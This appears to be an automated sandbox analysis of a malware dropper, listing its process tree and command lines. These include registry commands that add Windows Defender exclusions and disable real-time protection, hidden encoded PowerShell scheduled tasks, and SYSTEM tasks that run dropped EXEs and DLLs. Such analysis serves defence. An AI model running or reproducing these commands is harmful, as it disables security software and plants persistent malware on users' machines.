PID 1796 wrote to memory of 1288	1796	cmd.exe	reg.exe
PID 1796 wrote to memory of 1288	1796	cmd.exe	reg.exe
PID 1796 wrote to memory of 1288	1796	cmd.exe	reg.exe
PID 1796 wrote to memory of 1288	1796	cmd.exe	reg.exe
PID 1796 wrote to memory of 1288	1796	cmd.exe	reg.exe
PID 1796 wrote to memory of 1288	1796	cmd.exe	reg.exe
PID 1796 wrote to memory of 696	1796	cmd.exe	reg.exe
PID 1796 wrote to memory of 696	1796	cmd.exe	reg.exe
PID 1796 wrote to memory of 696	1796	cmd.exe	reg.exe
PID 1796 wrote to memory of 696	1796	cmd.exe	reg.exe
PID 1796 wrote to memory of 696	1796	cmd.exe	reg.exe
PID 1796 wrote to memory of 696	1796	cmd.exe	reg.exe
PID 1796 wrote to memory of 696	1796	cmd.exe	reg.exe
PID 1064 wrote to memory of 1260	1064	Install.exe	schtasks.exe
PID 1064 wrote to memory of 1260	1064	Install.exe	schtasks.exe
PID 1064 wrote to memory of 1260	1064	Install.exe	schtasks.exe
PID 1064 wrote to memory of 1260	1064	Install.exe	schtasks.exe
PID 1064 wrote to memory of 1260	1064	Install.exe	schtasks.exe
PID 1064 wrote to memory of 1260	1064	Install.exe	schtasks.exe
PID 1064 wrote to memory of 1260	1064	Install.exe	schtasks.exe
PID 1152 wrote to memory of 964	1152	forfiles.exe	cmd.exe
PID 1152 wrote to memory of 964	1152	forfiles.exe	cmd.exe
PID 1152 wrote to memory of 964	1152	forfiles.exe	cmd.exe
PID 1152 wrote to memory of 964	1152	forfiles.exe	cmd.exe
PID 1152 wrote to memory of 964	1152	forfiles.exe	cmd.exe
PID 1152 wrote to memory of 964	1152	forfiles.exe	cmd.exe
PID 1152 wrote to memory of 964	1152	forfiles.exe	cmd.exe
PID 964 wrote to memory of 2024	964	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Loads dropped DLL
Suspicious use of WriteProcessMemory

PID:1272

C:\Users\Admin\AppData\Local\Temp\7zSB19.tmp\Install.exe

.\Install.exe

Executes dropped EXE
Loads dropped DLL
Suspicious use of WriteProcessMemory

PID:1200

C:\Users\Admin\AppData\Local\Temp\7zSEF0.tmp\Install.exe

.\Install.exe /S /site_id "525403"

Executes dropped EXE
Checks BIOS information in registry
Loads dropped DLL
Drops file in System32 directory
Enumerates system info in registry
Suspicious use of WriteProcessMemory

PID:1064

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

Suspicious use of WriteProcessMemory

PID:1644

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

Suspicious use of WriteProcessMemory

PID:1796

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

PID:1288

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

PID:696

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

Suspicious use of WriteProcessMemory

PID:1152

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

Suspicious use of WriteProcessMemory

PID:964

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

PID:2024

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

PID:2016

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gkIDymHXl" /SC once /ST 04:04:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

Creates scheduled task(s)

PID:1260

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gkIDymHXl"

PID:1976

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gkIDymHXl"

PID:856

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bLqLKLLaYUqLtSzfKw" /SC once /ST 11:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\KKZBahpSWposEVZUD\CllXbpirgIktGNO\VsQqMDh.exe\" Pi /site_id 525403 /S" /V1 /F

Drops file in Windows directory
Creates scheduled task(s)

PID:920

C:\Windows\system32\taskeng.exe

taskeng.exe {326E6786-327D-41F7-92BF-26B09E878144} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]

PID:1412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

Drops file in System32 directory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken

PID:2032

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

PID:1348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

Drops file in System32 directory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken

PID:2024

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

PID:1984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

Drops file in System32 directory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken

PID:1088

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

PID:1852

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

Drops file in System32 directory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken

PID:956

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

PID:964

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

PID:1696

C:\Windows\system32\taskeng.exe

taskeng.exe {2D167967-E6D0-47EF-95DC-ECE7F5073716} S-1-5-18:NT AUTHORITY\System:Service:

PID:928

C:\Users\Admin\AppData\Local\Temp\KKZBahpSWposEVZUD\CllXbpirgIktGNO\VsQqMDh.exe

C:\Users\Admin\AppData\Local\Temp\KKZBahpSWposEVZUD\CllXbpirgIktGNO\VsQqMDh.exe Pi /site_id 525403 /S

Executes dropped EXE
Drops file in System32 directory

PID:1016

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gAodLgqNQ" /SC once /ST 06:56:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

Creates scheduled task(s)

PID:1748

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gAodLgqNQ"

PID:1128

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gAodLgqNQ"

PID:1944

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

PID:1704

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

Modifies Windows Defender Real-time Protection settings

PID:1668

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

PID:1616

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

Modifies Windows Defender Real-time Protection settings

PID:1640

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gzWfZXFau" /SC once /ST 03:03:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

Creates scheduled task(s)

PID:740

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gzWfZXFau"

PID:1516

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gzWfZXFau"

PID:2024

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\THZROCWpyYwmtzQt" /t REG_DWORD /d 0 /reg:32

PID:1808

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\THZROCWpyYwmtzQt" /t REG_DWORD /d 0 /reg:32

Windows security bypass

PID:1384

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\THZROCWpyYwmtzQt" /t REG_DWORD /d 0 /reg:64

PID:1648

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\THZROCWpyYwmtzQt" /t REG_DWORD /d 0 /reg:64

Windows security bypass

PID:960

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\THZROCWpyYwmtzQt" /t REG_DWORD /d 0 /reg:32

PID:1396

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\THZROCWpyYwmtzQt" /t REG_DWORD /d 0 /reg:32

PID:1876

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\THZROCWpyYwmtzQt" /t REG_DWORD /d 0 /reg:64

PID:2032

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\THZROCWpyYwmtzQt" /t REG_DWORD /d 0 /reg:64

PID:1772

C:\Windows\SysWOW64\cmd.exe

cmd /C copy nul "C:\Windows\Temp\THZROCWpyYwmtzQt\KDWehHOn\KXRoCVYuJACDiTTJ.wsf"

PID:1332

C:\Windows\SysWOW64\wscript.exe

wscript "C:\Windows\Temp\THZROCWpyYwmtzQt\KDWehHOn\KXRoCVYuJACDiTTJ.wsf"

Modifies data under HKEY_USERS

PID:2008

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BKLfbgsFFbyBAmZWNsR" /t REG_DWORD /d 0 /reg:32

Windows security bypass

PID:1000

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BKLfbgsFFbyBAmZWNsR" /t REG_DWORD /d 0 /reg:64

Windows security bypass

PID:956

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FsFQcVpRNSNUC" /t REG_DWORD /d 0 /reg:32

Windows security bypass

PID:1196

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FsFQcVpRNSNUC" /t REG_DWORD /d 0 /reg:64

PID:1268

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ftljgLlqPYjU2" /t REG_DWORD /d 0 /reg:32

PID:1432

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ftljgLlqPYjU2" /t REG_DWORD /d 0 /reg:64

Windows security bypass

PID:2000

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gtYbQvtxU" /t REG_DWORD /d 0 /reg:32

Windows security bypass

PID:536

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gtYbQvtxU" /t REG_DWORD /d 0 /reg:64

Windows security bypass

PID:1572

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mpIiGdOCcMUn" /t REG_DWORD /d 0 /reg:32

PID:2016

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mpIiGdOCcMUn" /t REG_DWORD /d 0 /reg:64

PID:1636

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\jxOPGMlVxWbacrVB" /t REG_DWORD /d 0 /reg:32

Windows security bypass

PID:2024

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\jxOPGMlVxWbacrVB" /t REG_DWORD /d 0 /reg:64

Windows security bypass

PID:1744

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\KKZBahpSWposEVZUD" /t REG_DWORD /d 0 /reg:32

PID:1776

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\KKZBahpSWposEVZUD" /t REG_DWORD /d 0 /reg:64

PID:1108

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\THZROCWpyYwmtzQt" /t REG_DWORD /d 0 /reg:32

Windows security bypass

PID:1696

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\THZROCWpyYwmtzQt" /t REG_DWORD /d 0 /reg:64

PID:1540

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BKLfbgsFFbyBAmZWNsR" /t REG_DWORD /d 0 /reg:32

PID:568

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BKLfbgsFFbyBAmZWNsR" /t REG_DWORD /d 0 /reg:64

PID:968

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FsFQcVpRNSNUC" /t REG_DWORD /d 0 /reg:32

PID:1144

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FsFQcVpRNSNUC" /t REG_DWORD /d 0 /reg:64

PID:1748

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ftljgLlqPYjU2" /t REG_DWORD /d 0 /reg:32

Windows security bypass

PID:1432

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ftljgLlqPYjU2" /t REG_DWORD /d 0 /reg:64

PID:1716

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gtYbQvtxU" /t REG_DWORD /d 0 /reg:32

PID:888

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gtYbQvtxU" /t REG_DWORD /d 0 /reg:64

PID:1568

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mpIiGdOCcMUn" /t REG_DWORD /d 0 /reg:64

PID:1980

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mpIiGdOCcMUn" /t REG_DWORD /d 0 /reg:32

PID:1752

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\jxOPGMlVxWbacrVB" /t REG_DWORD /d 0 /reg:32

PID:1308

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\jxOPGMlVxWbacrVB" /t REG_DWORD /d 0 /reg:64

PID:1792

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\KKZBahpSWposEVZUD" /t REG_DWORD /d 0 /reg:32

PID:1984

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\KKZBahpSWposEVZUD" /t REG_DWORD /d 0 /reg:64

PID:1876

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\THZROCWpyYwmtzQt" /t REG_DWORD /d 0 /reg:32

Windows security bypass

PID:1108

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\THZROCWpyYwmtzQt" /t REG_DWORD /d 0 /reg:64

PID:1884

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gCMFJHikm" /SC once /ST 01:24:24 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

Windows security bypass
Creates scheduled task(s)

PID:1540

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gCMFJHikm"

PID:772

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gCMFJHikm"

PID:536

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

PID:620

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

PID:1680

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

PID:1848

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

PID:1980

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "RVtwMREJXQsvxhCBJ" /SC once /ST 07:43:16 /RU "SYSTEM" /TR "\"C:\Windows\Temp\THZROCWpyYwmtzQt\fatNgZIsyyqodQs\fulLrMk.exe\" VC /site_id 525403 /S" /V1 /F

Drops file in Windows directory
Creates scheduled task(s)

PID:1636

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "RVtwMREJXQsvxhCBJ"

PID:1868

C:\Windows\Temp\THZROCWpyYwmtzQt\fatNgZIsyyqodQs\fulLrMk.exe

C:\Windows\Temp\THZROCWpyYwmtzQt\fatNgZIsyyqodQs\fulLrMk.exe VC /site_id 525403 /S

Executes dropped EXE
Checks computer location settings
Drops Chrome extension
Drops file in System32 directory
Drops file in Program Files directory
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses

PID:2036

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bLqLKLLaYUqLtSzfKw"

PID:1772

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

PID:1160

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

PID:1108

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

PID:740

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\gtYbQvtxU\zJLbGz.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FCAPlZuTAsqwUyW" /V1 /F

Drops file in Windows directory
Creates scheduled task(s)

PID:1884

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "FCAPlZuTAsqwUyW2" /F /xml "C:\Program Files (x86)\gtYbQvtxU\vaPyXJI.xml" /RU "SYSTEM"

Creates scheduled task(s)

PID:1128

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "FCAPlZuTAsqwUyW"

PID:956

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "FCAPlZuTAsqwUyW"

PID:848

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bwAFpYAhGjMvtv" /F /xml "C:\Program Files (x86)\ftljgLlqPYjU2\WffKAHc.xml" /RU "SYSTEM"

Creates scheduled task(s)

PID:1088

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "McuOLUVUlugVY2" /F /xml "C:\ProgramData\jxOPGMlVxWbacrVB\tpsaXOl.xml" /RU "SYSTEM"

Creates scheduled task(s)

PID:1624

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "xLmVYQFXqdUlrpoGi2" /F /xml "C:\Program Files (x86)\BKLfbgsFFbyBAmZWNsR\RZcQXho.xml" /RU "SYSTEM"

Creates scheduled task(s)

PID:1656

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "UgCFryohpROslohYHbe2" /F /xml "C:\Program Files (x86)\FsFQcVpRNSNUC\OEUKTNj.xml" /RU "SYSTEM"

Creates scheduled task(s)

PID:1484

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "GltAVngPgjmuayZGp" /SC once /ST 10:10:29 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\THZROCWpyYwmtzQt\IOQfhOHV\anbZsWR.dll\",#1 /site_id 525403" /V1 /F

Drops file in Windows directory
Creates scheduled task(s)

PID:1384

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "GltAVngPgjmuayZGp"

PID:1388

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

PID:1160

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

PID:896

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

PID:1492

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

PID:1196

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "RVtwMREJXQsvxhCBJ"

PID:920

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\THZROCWpyYwmtzQt\IOQfhOHV\anbZsWR.dll",#1 /site_id 525403

PID:1016

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\THZROCWpyYwmtzQt\IOQfhOHV\anbZsWR.dll",#1 /site_id 525403

Blocklisted process makes network request
Checks BIOS information in registry
Loads dropped DLL
Drops file in System32 directory
Enumerates system info in registry
Modifies data under HKEY_USERS

PID:1876

